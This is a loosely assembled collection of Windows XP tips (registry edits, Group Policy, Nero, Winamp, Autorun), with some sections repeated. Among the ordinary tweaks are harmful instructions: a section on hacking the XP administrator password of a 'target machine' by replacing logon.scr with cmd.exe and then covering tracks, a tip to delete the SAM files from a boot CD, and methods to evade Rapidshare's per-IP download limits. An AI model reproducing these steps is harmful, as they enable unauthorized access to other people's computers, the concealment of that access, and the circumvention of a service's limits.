Restore Previously Open Folders After Shutdown

If you need to access lot of folders on your home computer or on the network regularly, then you can set them re-open automatically, when you will login, shutdown or restart your computer next time. There is no need
to open regularly used folders manually, just configure the simple sitting, your computer will automatically reload all the previously opened windows.

By default windows XP disables this option to reload automatically all the previously opened windows, when you login on, shutdown or restart your computer.

Follow the given steps to configure your computer to reload previously opened folders automatically after shutdown.

To edit this feature, you will need to be logged into your computer with administrative rights.
First click on Start button then go to Control Panel.
Open the “Appearance and Themes” option in control panel then click on Folder Options.
A small windows dialog box will appear with the title “Folder options”, click on View tab.
Under the Advanced setting section, scroll down to bottom and click the “Restore previous folder windows at logon” option and then click Ok button to save sitting.
Now when you log off, restart or shutdown, your computer will automatically open the previously opened folders from the same location as before.

How to Permanently Stick Your Program in Start Men

Let's say, you have a software that is very important but you don't use it frequently like your tax software for example. So the practical difficulty is to find it every time from All Programs because you aren't likely to get it under Start menu option. It kills time, complicates the process and consequently makes you less productive. So what you do is:

1. Right click on any .exe file in Explorer, My Computer, Desktop
2. Select Pin to Start Menu,
3. The program is then displayed on the start menu, above the separator line.
4. To remove it, click the file on the start menu and select 'Unpin from Start Menu'. Below you can check the before and after shots.

You are done now. Your program will forever remain in the Start menu or until the next window crash.

How To Delete Annoying Multiple Entries in Boot Screen

Suppose you have multiple copies of Windows XP installed in your PC in different drives or installed Windows XP on top of another operating system like Windows 98 or Windows 2000. Now, though you may have removed some or all of the older versions, still the boot screen continues to show the old operating system entries. Isn't it annoying and confusing to remember and select every time the only right option? Don't worry, here is how you can get rid of the problem forever:

1. Load windows and login if required
2. Go to Start menu, click on Run and then type cmd. This open up the command window.
3. Type this command:
bootcfg /delete /id x
where x is the number of the option you want to delete. Say, for example, you want to delete 2nd boot option then you will type bootcfg /delete /id 2 and so on.
4. Now reboot the machine to check that you have only the correct option(s) available.

Note:

* Please be careful in step 3 and don't delete the correct operating system because that will prevent you from booting.
* Repeat step 3 to delete all unnecessary operating system menus.

Rapid Share Tweaks

Rapidshare traces the users IP address to limit each user to a certain amount of downloading per day. To get around this, you need to show the rapidshare server a different IP address.

Here are some methods for doing this:

1. Short-Out the JavaScript:

1. Goto the page you want to download
2. Select FREE button
3. In the address bar put the following: javascript:alert(c=0)
4. Click OK
5. Click OK to the pop-up box
6. Enter the captcha
7. Download Your File

2. Request a new IP address from your ISP server.

Here's how to do it in windows:
1. Click Start
2. Click run
3. In the run box type cmd.exe and click OK
4. When the command prompt opens type the following. ENTER after each new line.
ipconfig /flushdns
ipconfig /release
ipconfig /renew
exit

5. Erase your cookies in whatever browser you are using.
6. Try the rapidshare download again.

Frequently you will be assigned a new IP address when this happens. Sometime you will, sometimes you will not. If you are on a fixed IP address, this method will not work. To be honest, I do not know how to do this in linux/unix/etc. If this works for you, you may want to save the above commands into a batch file, and just run it when you need it.

3. Use a proxy with SwitchProxy and Firefox:

1. Download and install Firefox if you have not already
2. Download and install SwitchProxy
3. Google for free proxies
4. When you hit your download limit, clean your cookies and change your proxy

Hide the Text Below Desktop Icons

Some icons you use so regularly that you don’t need that annoying text below the icon. A good example of this is Internet Explorer or Mozilla Firefox. We all know what those icons look like. To remove that text, just follow these instructions.

Right-click on the shortcut icon, and choose Rename. Now hold down the Alt key and type in 255 on the keypad to the right of the keyboard. You can’t use the number keys right above the keyboard. If you have a laptop, you can turn on Numlock and then use the little number keys next to the regular letters.

The way this works is that the Alt+255 character is blank, so the shortcut filename is actually just named with a character that is completely blank. For the first shortcut on the desktop, you would use Alt+255, but for the next shortcut, you’ll have to enter the combination twice (Alt+255, Alt+255). For the third, three times… and so on. This is because you can’t name two different shortcuts or files the same thing. Entering Alt+225 twice would give you two blanks instead of one.

Now we have a beautiful icon, with no text underneath it!

Change the Default Directory of Software Installation

You may want to change the location of your system default folder (C:\Program Files) from C drive to another system drives (D or E drive). By default software setup will attempt to install program in C:\Program Files directory. It is good practice to make the backup of the installed programs, if you installed all your programs in other than C drive. If you have little knowledge about editing windows registry then you can configure your computer for this purpose.

Follow the given steps to configure windows registry:

1. Click on Start button then type Regedit in Run option.

2. Here navigate to: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion

3. In right side panel, double click on ProgramFileDir.

4. Now modify the value to any other drive (for example D:\Program Files).

Now close the registry editor and restart your computer after any changes to go into effect.

Create Nero Digital a.k.a. MPEG-4 Content

“Recode DVDs and Videos to Nero Digital” allows you to convert content from one or several personal, non-copy-protected DVDs to Nero Digital or MPEG-4 files. The process is similar to creating a DVD video, with the difference that you can choose from among different Nero Digital categories such as Nero Digital, Nero Digital AVC, Sony Memory Stick Video, and Apple iPod. Under Nero Digital Profile, you can select Mobile, Portable, Standard, Cinema, and HDTV—their purpose is self-explanatory. You can also trim the video to remove unwanted portions. What’s more, you can also create chapters by clicking on the Chapter button to give your DVD a more professional feel.
After you click on Next, you are provided with the option to either create the recoded files on the hard drive, burn to a CD/DVD-RW, or create an image file. You can also tweak the quality settings in Nero Digital Settings, but it’s better to leave these alone unless you know exactly what you’re doing.

Tweak The DVD Compilation

Click on “Lock Ratio” to stop the recording quality of a DVD title from being changed automatically. However, you can still change the quality manually by moving the slider. Click “Unlock Ratio” to let Recode automatically modify the video quality. The “Fit to Target” check box is checked by default—this means that the disc inserted will be automatically recoded to fit the size of the blank disk inserted (where possible). If “Fit to Target” has been checked, you can select the target from the dropdown—the choices available are 8 cm DVD (1.4 GB), DVD-5 (4.7 GB), DVD-9 (8.5 GB), and Custom.
The level indicator will be adjusted depending on the target. When the box is disabled, the size of a copy can be specified independently of the disc’s size limitations.
Click on an item in the list and click on Play to preview the video. In the Audio area, you can select which audio track you want in the output—many DVDs have 2.1 as well as 5.1 channel sound tracks; some even have multiple-language audio tracks. Here you can choose the sound track of the format and language suitable for you. The Subtitles area works the same way. At the bottom of the page is the space indicator that lets you keep check on the size of the DVD. You should not allow the indicator to enter the red region.

Copying DVDs To DVDs

Click “Import DVD” to open the dialog to import the selected DVD or files onto the
hard drive. You can use the Enable and Disable buttons to include or exclude parts of the title (such as extras) from the compilation. You can even enable or disable parts of the main movie or extras. In order to maintain the menu structure and compatibility of the recoded DVD, something else needs to take the place of the part that has been deleted. Use the drop-down to select the substitute—you can choose from among Custom Picture, Slide Show (where you can view a slide-show of stills from the deleted video) or Custom Color.

30 Minutes Experts-Master Nero Recode 2

Authoring your own DVD is easier than you think!
Burning a DVD or a CD today means using Nero—the simple user interface and
powerful features have made it the de facto burning software.
Most of us use Nero regularly, but in addition to the burning program, Nero bundles lots of useful goodies. One of these is Nero Recode 2.
Nero Recode 2 is a tool that can be used to copy, compile, and convert to and from
DVDs that aren’t copy-protected. You can launch it from Start > All Programs > Nero 7
Premium > Photo and Video > Nero Recode. In the main window, you will see five tasks:

Recode an Entire DVD to DVD
Recode Main Movie to DVD
Remake a DVD
Recode DVDs and Videos to Nero
Digital
Recode Main Movie to Nero Digital

Click on “Recode an Entire DVD” to DVD to copy the entire DVD. The DVD-Video area
of the backup window for your DVDs will now open.

Magic With Music

If you’re having one of those days when you need to hear only slow, depressing songs, or if you’re having a party and don’t want any of the aforementioned songs getting in your way, use the MusicMagic plugin that comes bundled with Winamp. It analyses your music and relates tracks according to their “acoustic fingerprint”, so similar-sounding tracks fall under the same playlist. You can access it from the Media Library (it’s the second entry from the bottom) and change its settings under Options > Preferences > Media Library > Predixis MusicMagic.

Really Random Music

One quirk with Winamp is that when using the Shuffle feature, you might wind up
listening to the same set of songs over and over again—we’ve seen situations where
out of 500 songs in a playlist, only 200 were played often,
and the rest rarely. This is
actually expected behaviour, since shuffling doesn’t necessarily mean that songs won’t be repeated. You can tweak the Shuffle Morph Rate in the preferences (Options > Preferences > General Preferences > Playlist), but if the results don’t satisfy you, turn off the shuffle feature and instead, click on Misc. in the playlist editor and select Sort > Randomize List for a truly random playlist.

Don’t Read ID3s All At Once

By default, Winamp will load a song’s information as soon as it’s queued into the
playlist. If you’ve loaded a large number of files, though, you might want to reduce the time between Winamp starting up and your music actually playing. Go to Options > Preferences > Titles (under General Preferences) and select “Read metadata only when files are played”.

Use The Global Hotkeys

For some reason, this feature has been disabled by default, but it’s extremely useful if you’re listening to music while working on another program and don’t want to bother yourself switching to Winamp to change the song you’re hearing. Go to Options > Preferences (or [Ctrl] + [P]) > Global Hotkeys and check Enable. All the hotkeys are simple [Ctrl] + [Alt] shortcuts that work even when Winamp isn’t in focus. You can even add your own and customise what exists—which you might need to because volume controls sometimes don’t register with Windows XP.

Get Rid Of The Update Nag

Aren’t you frustrated by the number of times Windows asks you if you want to restart
after an update? It won’t even listen if you tell it to restart later! Here’s how you can get rid of that.
In group policy, you’ll find this blissful setting under Local Computer Policy >
Computer Configuration > Administrative Templates > Windows Components >
Windows Update > Re-prompt for restart with scheduled installations. Done! Now all
you have is an icon in the system tray to remind you in the unobrtusive way that it
should have in the first place.

Disable Windows Key Shortcuts

If (for whatever reason) you want to prevent users from using shortcuts like [Windows] + [E] and so on, navigate to User Configuration > Administrative Templates > Windows Components > Windows Explorer and enable the “Turn off Windows + X hotkeys” setting.

No More System Tray

You’ll find this setting under User Configuration > Administrative Templates > Start
Menu and Taskbar. Double-click “Hide the Notification Area” and choose Enabled.
When you log on next, you’ll only see the system clock in the tray, which you can alsoremove by right-clicking on the Taskbar, selecting Properties and un-checking “Show the Clock”.

No More Windows CD

To avoid the hassle of hunting down your Windows XP CD every time you want to
restore a system file (Windows File Protection at work) or add and remove components, just copy the entire thing to your disk and modify a setting in the Group Policy Editor. Navigate to Computer Configuration > Administrative Templates > System. On the right-hand pane, you’ll find “Specify Windows installation file location”. Double-click this, select Enable, and enter the path to your Windows XP setup file. You can even point it to a network path on your office LAN, so you don’t have to run to your system admin every time Windows wants the installation CD.

Clear The Page File On Shutdown

This setting may or may not improve your system’s performance (it depends on your
usage patterns), but it does provide relief to the paranoid. Your Windows swap file may contain unencrypted text, including passwords, that could be exploited by interested parties. To delete the file when you shut down your system, you’ll find a setting under Computer Configuration > Windows Settings > Security Settings > Local Policies > Security Options called “Shutdown: Clear virtual memory pagefile”. Double-click this, select Enabled and click OK. Your shutdown time will increase marginally, though.

Avoid The Registry

You don’t really need the Registry Editor or third-party tools for every single tweak you want to make to Windows. If you’re using XP Professional (sorry, Home Edition users), the Group Policy Editor (Start > Run > gpedit.msc > [Enter]) hides an obscene number of settings that you can use to control your PC. If you’re a domain administrator, these settings affect all users under your domain. Here are some of its finest.

Start > Run Shortcuts

Use these shortcuts in Start > Run to get to your configuration tools faster in Windows XP Professional:

compmgmt.msc Computer management console
devmgmt.msc Device manager
diskmgmt.msc Disk management
dfrg.msc Disk defragmenter
fsmgmt.msc Shared folders
gpedit.msc Group policy editor
lusrmgr.msc Local users and groups
perfmon.msc Performance monitor
secpol.msc Local security settings
services.msc Manage services

Sending Files To Trash With Crowded Desktops

If you want to drag a file to the Recycle Bin, but have too many windows open, just
drag the file to an empty area on the taskbar—the windows will all minimise, giving
you free and uninterrupted access to the Recycle bin!

Which To Improves The Quality Of Fonts

With XP, Microsoft introduced ClearType, which improves the quality of fonts
displayed on your screen, especially if you’re using an LCD monitor. However, the
results on CRT monitors were a tad disappointing. However, with a little fine-tuning, you can get satisfactory results too. Just visit www.microsoft.com/typography/cleartype/tuner/Step1.aspx using Internet Explorer to start up the ClearType Tuner. The site will ask you if you want to download the ActiveX control.
Accept it and go through the necessary steps to get the best ClearType setting for you. Alternatively, you could get the ClearType Tuner powetoy here:

How You Can Get Rid Of The Animated Dog

The Microsoft obsession with annoying animated characters didn’t end with the demise
of Clippy—here’s how you can get rid of the animated dog that turns up every time you want to search for files.
In the search window, click Change Preferences > Without an animated screen
character.
Furthermore, to get back the Windows 2000-style search window, go to Change
Preferences > Change files and folders search behaviour and select Advanced. Finally—
sensible search.

Pretty Folder Pictures

We all know that images within a folder show up in the thumbnail view of the folder,
but what if you want only one of these images to show up? Just rename this image to
folder.jpg (folder.gif works too)! Even better, if you do this for your music collection,Windows Media Player will load this image as album cover art if you’ve disabled visualisations.

By default, Windows shares your all drives (C: shared as C$, D: as D$ and so on) so that you can access them over the network using your administrator password. However, if you’re the paranoid kind or need to share your admin password with your colleagues from time to time, you might want to turn this off. You can do this using the Sharing tab under the drive’s properties, but the shares are enabled again after you restart. For the permanent solutions, open the Registry Editor (Start > Run > “regedit” > [Enter])and navigate to HKEY_
LOCAL_MACHINESYSTEMCurrentControlSetServicesLanManServerParameters. Right-
click in the right-hand pane and select New > DWORD value. Call this DWORD
“AutoShareWks”, and assign it a value of 0 (which it should be by default). Restart your PC for the change to take effect.
Hate the “Shared Documents” icon at the top of your My Computer window? Instead of
trying to figure out why this bizarre “feature” was needed, here’s how you can be rid of it: open the Registry Editor
(Start > Run > “regedit” > [Enter]), go to
HKEY_LOCAL_MACHINESOFTWARE MicrosoftWindowsCurrentVersionExplorerMy ComputerNameSpace DelegateFolders, and delete the sub-key (it looks like a folder) called {59031a47-3f72-44a7-89c5-5595fe6b30ee}. You should see the effect
immediately.

While you rarely see a BSOD with Windows XP, the few times they do crop up are
usually due to misbehaving drivers. To see which of these (if any) is causing your
problems, use XP’s unsung Driver Verifier (Start > Run > “verifier” > [Enter]). In the first screen, select Create Standard Settings and move ahead to select which drivers to verify. Once you’ve done that, you’ll need to reboot to let the Verifier do its job. If a driver is indeed your problem, then you’ll get a blue screen during the booting process which will tell you which driver it is. If your PC boots fine, then your problems lie elsewhere.

To reset the verifier, do Start > Run > verifier /reset > [Enter].

If you’ve got a large number of folders you want to share on the network, navigating to each one of them and going into their properties and changing them one by one can be quite a nuisance. Even sharing can be as simple as “Next, next, and next” with the Shared Folder Wizard (Start > Run > “shrpubw” > [Enter]).
You can even set share permissions right there, so there’s no need to go back to those shared folders for additional settings. Just remember to check the “Run this wizard again” box at the last dialog if you want to move on to the next folder.

Speed Up Your USB Stick

If you’ve got yourself a large USB Flash drive (at least 1 GB, preferably 2), you can move your system’s page file onto it for significantly better performance, because accessing flash memory is typically faster than your average hard disk.
You should also optimise the Flash drive for performance—right-click on it in My Computer, select Properties. Go to the Hardware tab, select your Flash drive and click Properties. Under the Policies tab, select “Optimise for performance”.

A couple of caveats: Firstly, if you remove this drive while Windows is running, you
could cause it to crash, so be careful there. Secondly, Flash drives are good only for limited read/write cycles, so this approach is definitely going to eat into its lifetime. Use this tip only for when you really need the performance boost rather than as a permanent solution.

How to Send Any File to Any Place By One Click

What if I tell you a trick that helps you to send a particular file anywhere you like in Windows XP without going to that particular place? Sounds interesting?

The process is simple. You can do that by providing more locations to Send To option that comes when you right click on a particular file. To do that,

Go to C:\Documents and Settings\User_name\SendTo
(where User_Name is your user name)
The folder will be filled with shortcuts to all the locations you find on your Send To context menu.
To remove an item from the Send To menu, delete the shortcut from the folder.
AND

To add an item to the menu, add a shortcut to the folder by highlighting the folder,
Choose File → New → Shortcut, and follow the subsequent instructions for creating a shortcut. The new setting will take effect immediately; you don't have to exit Windows Explorer for it to go into effect.

How to Permanently Stick Your Program in Start Menu

Let's say, you have a software that is very important but you don't use it frequently like your tax software for example. So the practical difficulty is to find it every time from All Programs because you aren't likely to get it under Start menu option. It kills time, complicates the process and consequently makes you less productive. So what you do is:

Right click on any .exe file in Explorer, My Computer, Desktop
Select Pin to Start Menu,
The program is then displayed on the start menu, above the separator line.
To remove it, click the file on the start menu and select 'Unpin from Start Menu'. Below you can check the before and after shots.
You are done now. Your program will forever remain in the Start menu or until the next window crash.

How To Make Start Menu Arrive Faster

Start menu is like an unemployed oaf. It makes a leisurely appearance while you are waiting for it after logging in to Windows. Here is how you can make it appear much faster:

Go to registry by clicking on Start menu -> run and type regedit
Find out HKEY_CURRENT_USER/ControlPanel/Desktop/MenuShowDelay
or
Press CTRL+F and then at the search box type MenuShowDelay
From the default 400, change to something a little snappier. Like 50,40, 30 or say 0!
P.S.- Its always good to be on the safer side before modifying registry settings and make backups.

How To Prioritize Your Important Applications

We do multitasking all the time with our PC right? How unfair it would be to lose a CD while burning your favorite songs just because you were watching a video at the same time and the processor couldn't take the load?

Here is your solution:

Press CTRL-SHIFT-ESC.
Go to the second tab called Processes
Right click on one of the active processes, you will see the Set Priority option
For e.g., Run your CD writer program, set the priority higher, and no more wasted cd from now on. Happy?

How to Rename Recycle Bin on Windows

How irritating is that when you want to do something from your own machine and you can not do it just because the programmer didn't give you the facility? Let's say one fine morning you said, I will rename 'Recycle Bin' to
'Use Me' or 'Trash Can'. Can you do it? … Well, you are lucky this time. I will tell you how you can rename your recycle bin:

Go to registry by clicking on Start menu -> run
Type regedit
Go to: HKEY_CLASSES_ROOT/CLSID/{645FF040-5081-101B-9F08-00AA002F954E}
or
Press CTRL+F and then at the search box type {645FF040-5081-101B-9F08-00AA002F954E}
Right click on default and click on Modify
Change the name of Recycle Bin to whatever you want.
You are done!

P.S.- Its always good to be on the safer side before modifying registry settings and make backups.

How to Convert between FAT32 & NTFS in Windows

FAT32 & NTFS, for those its greek, are two popular file systems available in windows. For those who are curious let me give a simple overview of both of them:

NTFS provides:

advanced security using access control lists
Provides file & directory compression for storing more data
Encryption
Quotas
Robustness
NTFS is highly recommended for sensitive data. A clean installed of Windows XP installs NTFS by default. However if you are installing Windows XP over other operating system like Windows 98, you may have installed FAT32 as your file system.

The only benefit of FAT32 is that you can simultaneously use FAT32 formatted disks with older operating systems like Windows 95 Service Pack 2 and Windows 98 in a machine with multiple operating systems.

Personally I would always recommend NTFS over FAT32 any day. More on FAT32 & NTFS here.

So now if you are allured to convert your files to NTFS , is there a way? Yes sir. there is.

Open Command Prompt.
Click Start, point to All Programs,
Point to Accessories
Click Command Prompt
In the command prompt window, type: convert drive_letter: /fs:ntfs
For example, typing convert D: /fs:ntfs would format drive D: from FAT to NTFS.

Isn't it simple ?

How To Delete Annoying Multiple Entries in Boot Screen

Suppose you have multiple copies of Windows XP installed in your PC in different drives or installed Windows XP on top of another operating system like Windows 98 or Windows 2000. Now, though you may have removed some or all of the older versions, still the boot screen continues to show the old operating system entries. Isn't it annoying and confusing to remember and select every time the only right option? Don't worry, here is how you can get rid of the problem forever:

Load windows and login if required
Go to Start menu, click on Run and then type cmd. This open up the command window.
Type this command:
bootcfg /delete /id x
where x is the number of the option you want to delete. Say, for example, you want to delete 2nd boot option then you will type bootcfg /delete /id 2 and so on.
Now reboot the machine to check that you have only the correct option(s) available.
Note:

Please be careful in step 3 and don't delete the correct operating system because that will prevent you from booting.
Repeat step 3 to delete all unnecessary operating system menus.

How to Remove Shortcut Arrows to Give Desktop Icons a Better Look

Here's how you can remove those shortcut arrows from your desktop icons in Windows XP.

Go to registry by clicking on Start menu -> run and type regedit
Navigate to HKEY_CLASSES_ROOT -> lnkfile
or
Press CTRL+F and then at the search box type lnkfile and search.
Delete the IsShortcut registry value.
You may need to restart Windows XP.

P.S.- Its always good to be on the safer side before modifying registry settings and make backups.

How to Remove Hidden Software

Suppose you want to remove Windows Messenger, because its worthless according to you in this age of YM , G-Talks n all. How can you do it? Its not even listed in the Add Remove Program at the Control Panel.

Find and edit the text file at c:\windows\inf\sysoc.inf OR
Go to Windows folder
Find the Inf folder inside that
Search for the sysoc.inf file
Search for the word hide and remove it. Do NOT remove any other text from the line.
Now you can go to the Add or Remove Programs in the Control Panel
Select Add/Remove Windows Components and there you can find your unwanted software. Go ahead and Uninstall.

Shortcut or Single-Click to Quickly Lock Down Windows

We will show you a way to lock your windows with a double-click / single-click or a shortcut.

Now you have no excuse to leave your computer unprotected, even for a short break.

Create a new shortcut on your desktop using a right mouse click
enter rundll32.exeuser32.dll,LockWorkStation in the location field.
Name the shortcut with anything.
When needed just double click on it and you are done.its locked.
If you are lazier , just press Windows+L and that is it.

Registry Hackings

Display legal notice on startup:
Wanna tell your friends about the do's and dont's in your computer when they login in your absence. Well you can do it pretty easily by displaying a legal notice at system start up.

REGEDIT
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"legalnoticecaption"="enter your notice caption"
"legalnoticetext"="enter your legal notice text"

Automatic Administrator Login:
Well here's the trick which you can use to prove that Windows XP is not at all secure as multi-user operating system. Hacking the system registry from any account having access to system registry puts you in to the administrator account.
REGEDIT 4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"AutoAdminLogon"="1"

No Shutdown:
Wanna play with your friends by removing the shutdown option from start menu in their computer.
Just hack it down !!!
Regedit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
"NoClose"="DWORD:1"

Menu Delays:

Another minor and easy tweak to remove any delay from menus sliding out. For this you will need to use regedit (open regedit by going to Start -> Run..., then typing 'regedit' and pressing enter). The key you need to change is located in HKEY_CURRENT_USERControl PanelDesktop. The actual key is called MenuShowDelay - all you have to do is change the value to 0. Remember, you will have to re-boot your computer for this tweak to take effect.

GPEDIT.MSC And Autoplay

A great tweaking file that comes with XP is gpedit.msc. Go to Start -> Run... and then type in 'gpedit.msc' and press enter. This is effectively the Policies Editor, and it comes in handy often. For example, if you hate CD autoplay like I do and want to permanently disable it, you can use this tool to do so. Just run gpedit.msc, then go to Computer Configuration -> Administrative Templates -> System. In here you can see the value 'Turn Off Autoplay'. Right-click on it and then click 'Properties'.

Increasing options in add/remove programs:

Not a fan of MSN Messenger? don't want Windows Media Player on your system? Fair enough, but if you go to Add/Remove Programs in the Control Panel, by default none of Windows XP's 'built in' programs are visible. it's fairly easy to change, though... just open the file X:\Windows\inf\sysoc.inf (where X: is the drive letter where Windows XP is installed) in Notepad. You should see a section of the file something like this:

[Components]
NtComponents=ntoc.dll,NtOcSetupProc,,4
WBEM=ocgen.dll,OcEntry,wbemoc.inf,hide,7
Display=desk.cpl,DisplayOcSetupProc,,7
Fax=fxsocm.dll,FaxOcmSetupProc,fxsocm.inf,,7
NetOC=netoc.dll,NetOcSetupProc,netoc.inf,,7
iis=iis.dll,OcEntry,iis.inf,,7
com=comsetup.dll,OcEntry,comnt5.inf,hide,7
dtc=msdtcstp.dll,OcEntry,dtcnt5.inf,hide,7
IndexSrv_System = setupqry.dll,IndexSrv,setupqry.inf,,7
TerminalServer=TsOc.dll, HydraOc, TsOc.inf,hide,2
msmq=msmqocm.dll,MsmqOcm,msmqocm.inf,,6
ims=imsinsnt.dll,OcEntry,ims.inf,,7
fp_extensions=fp40ext.dll,FrontPage4Extensions,fp40ext.inf,,7
AutoUpdate=ocgen.dll,OcEntry,au.inf,hide,7
msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7
RootAutoUpdate=ocgen.dll,OcEntry,rootau.inf,,7
IEAccess=ocgen.dll,OcEntry,ieaccess.inf,,7

This is a list of all components installed at the moment. I've taken the example of MSN Messenger - the program entry called 'msmsgs', third-last line. You can see the word 'hide' highlighted - this is the string which tells Windows not to display the component in the Add/Remove Programs list. Fix this up by simply deleting the word 'hide' like so:

msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7

To this:

msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,,7

Now, after restarting, you should be able to see MSN Messenger in the Add/Remove Programs list. If you want to be able to quickly view and remove all components, simply open the sysoc.inf file and do a global find and replace for the word ",hide" and replace it with a single comma ",".

Automatically Kill Programs At Shutdown:

don't you hate it when, while trying to shut down, you get message boxes telling you that a program is still running? Making it so that Windows automatically kills applications running is a snap. Simply navigate to the HKEY_CURRENT_USERControl PanelDesktop directory in the Registry, then alter the key AutoEndTasks to the value

1.Speeding Up Share Viewing:

This is a great tweak. Before I found it, I was always smashing my head against the table waiting to view shares on other computers. Basically, when you connect to another computer with Windows XP, it checks for any Scheduled tasks on that computer - a fairly useless task, but one that can add up to 30 seconds of waiting on the other end - not good! Fortunately, it's fairly easy to disable this process. First, navigate to HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/Current Version/Explorer/RemoteComputer/NameSpace in the Registry. Below that, there should be a key called {D6277990-4C6A-11CF-8D87-00AA0060F5BF}. Just delete this, and after a restart, Windows will no longer check for scheduled tasks - mucho performance improvement!

Create a Shortcut to Lock Your Computer

Leaving your computer in a hurry but you don’t want to log off? You can double-click a shortcut on your desktop to quickly lock the keyboard and display without using CTRL+ALT+DEL or a screen saver. To create a shortcut on your desktop to lock your computer: Right-click the desktop. Point to New, and then click Shortcut. The Create Shortcut Wizard opens. In the text box, type the following: rundll32.exe user32.dll,LockWorkStation Click Next. Enter a name for the shortcut. You can call it "Lock Workstation" or choose any name you like. Click Finish. You can also change the shortcut's icon (my personal favorite is the padlock icon in shell32.dll). To change the icon: Right click the shortcut and then select Properties. Click the Shortcut tab, and then click the Change Icon button. In the Look for icons in this file text box, type: Shell32.dll. Click OK. Select one of the icons from the list and then click OK You could also give it a shortcut keystroke such CTRL+ALT+L. This would save you only one keystroke from the normal command, but it could be more convenient.

Speed up Internet Explorer 6 Favorites
For some reason, the Favorites menu in IE 6 seems to slow down dramatically sometimes--I've noticed this happens when you install Tweak UI 1.33, for example, and when you use the preview tip to speed up the Start menu. But here's a fix for the problem that does work, though it's unclear why: Just open a command line window (Start button -> Run -> cmd) and type sfc, then hit ENTER. This command line runs the System File Checker, which performs a number of services, all of which are completely unrelated to IE 6. But there you go: It works.

Aspi

WinXP does not come with an Aspi layer. So far almost 90% of the problems with WinXP and CD burning software are Aspi layer problems. After installing WinXP, before installing any CD burning software do a few things first: 1. Open up "My computer" and right click on the CD Recorder. If your CD recorder was detected as a CD recorder there will be a tab called "Recording". On this tab uncheck ALL of the boxes. apply or OK out of it and close my computer. 2. Next install the standard Aspi layer for NT. Reboot when asked. That's is. after the reboot you can install any of the currently working CD recording applications with no problems. If using CD Creator do not install direct CD or Take two as they are currently incompatible but Roxio has promised a fix as soon as XP is released.

Another way ...
Boot from win98 cd, delete the SAM, SAM.SAV, SAM.LOg files ( in sytem32/config folder ). Note: don't delete SAM.exe.

How to hack windows XP admin password

If you log into a limited account on your target machine and open up a dos prompt
then enter this set of commands Exactly:

cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos

Now what you have just done is told the computer to backup the command program
and the screen saver file, then edits the settings so when the machine boots the
screen saver you will get an unprotected dos prompt with out logging into XP.

Once this happens if you enter this command minus the quotes

"net user password"

If the Administrator Account is called Frank and you want the password blah enter this

"net user Frank blah"

and this changes the password on franks machine to blah and your in.

Have fun

p.s: dont forget to copy the contents of temphack back into the system32 dir to cover tracks.

How to Disable Autorun/AutoPlay in Windows XP/Vista

Dating back to Windows 95, Autorun allows an inserted CD-ROM to launch a function automatically, for example by installing a program, when the disc is inserted. This isn't always good news. It's how some malware, like rootkits, can be installed without your knowledge. Usually the disc has a file on it called Autorun.inf that tells it what to do when inserted.

Basic Workaround:
If you hold down the Shift key while inserting a CD-ROM/DVD-ROM, you can bypass Autorun most of the time. It works in Windows 95 to XP, but not in Windows Vista. Even in older versions of Windows it's not necessarily foolproof, but it has been successfully used to circumvent some copy-protection schemes installed on music CDs since around 2004.

Complicated Fix:
To disable Autorun for good in XP/Vista, you need to edit the Registry. As always, before you edit this database, it's smart to make a backup of it.

Click the Start button, then go to the Run command.

Type regedit and hit Return to open the Registry Editor. (In Vista, you'll probably have to click OK in the User Account Control warning dialog box.)

Go to the following Registry key:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom
Double-click on Autorun, and you'll see a default value of 1. Change it to 0 (zero). Then restart the computer.

After you go to all this trouble, don't double-click that autorun.inf file on the disk—it can still run if you do.

AutoPlay:
Autorun should not be confused with AutoPlay, which debuted in Windows XP. The latter features a dialog box that pops up when you insert a CD or DVD filled with electronic media—pictures, music, or video. It will ask you what to do with the data, whether to rip music to iTunes, for example. If the disc is empty, it may ask if you want to write any data to it. You can usually tell XP/Vista not to bother you again when one of these dialogs pops up. If that doesn't work . . .

In XP, right-click on a drive icon and select Properties. Each removable drive has an AutoPlay tab where you can preset what you want to happen. You can also use the TweakUI PowerToy to disable AutoPlay across drives. In Vista, an entirely new control panel exists just for setting global AutoPlay settings. If you turn off AutoPlay everywhere, you can still bring it up when you insert a CD–by holding down the Shift key.

Combine several RSS feeds into one with RSS Mixer

A new startup called RSS Mixer allows you to combine several RSS feeds from different websites into one, so that you have just one fat feed of updates. Creating mixes is easy; just get the individual feed URLs, add them and click "Mix it". The resulting feed can be read in any feed reader just like any other feed. It's also available as a webpage, mobile formatted page, as an Apple dashboard widget, Yahoo! widget, Vista widget, Google gadget for Google homepage or embedded into your blog or website.

The Mix can then be shared with other users and anybody can subscribe to it. RSS Mixer is also a searchable directory allowing you to search for Mixes created by other users. If you get a Mix you like, you can extend it by adding more feeds to it creating another Mix. RSS Mixer already has quite a lot of handy Mixes like the iPhone Topsites, Political news, Apple news, Gadget news etc.

13 Quick Tips To Search Google Like An Expert

1. Explicit Phrase: Lets say you are looking for content about internet marketing. Instead of just typing internet marketing into the Google search box, you will likely be better off searching explicitly for the phrase. To do this, simply enclose the search phrase within double quotes.
Example: "internet marketing"
2. Exclude Words: Lets say you want to search for content about internet marketing, but you want to exclude any results that contain the term advertising. To do this, simply use the "-" sign in front of the word you want to exclude.
Example Search: internet marketing -advertising
3. Site Specific Search: Often, you want to search a specific website for content that matches a certain phrase. Even if the site doesn’t support a built-in search feature, you can use Google to search the site for your term. Simply use the "site:somesite.com" modifier.
Example: "internet marketing" site:
Code: http://www.smallbusinesshub.com/
4. Similar Words and Synonyms: Let’s say you are want to include a word in your search, but want to include results that contain similar words or synonyms. To do this, use the "~" in front of the word.
Example: "internet marketing" ~professional
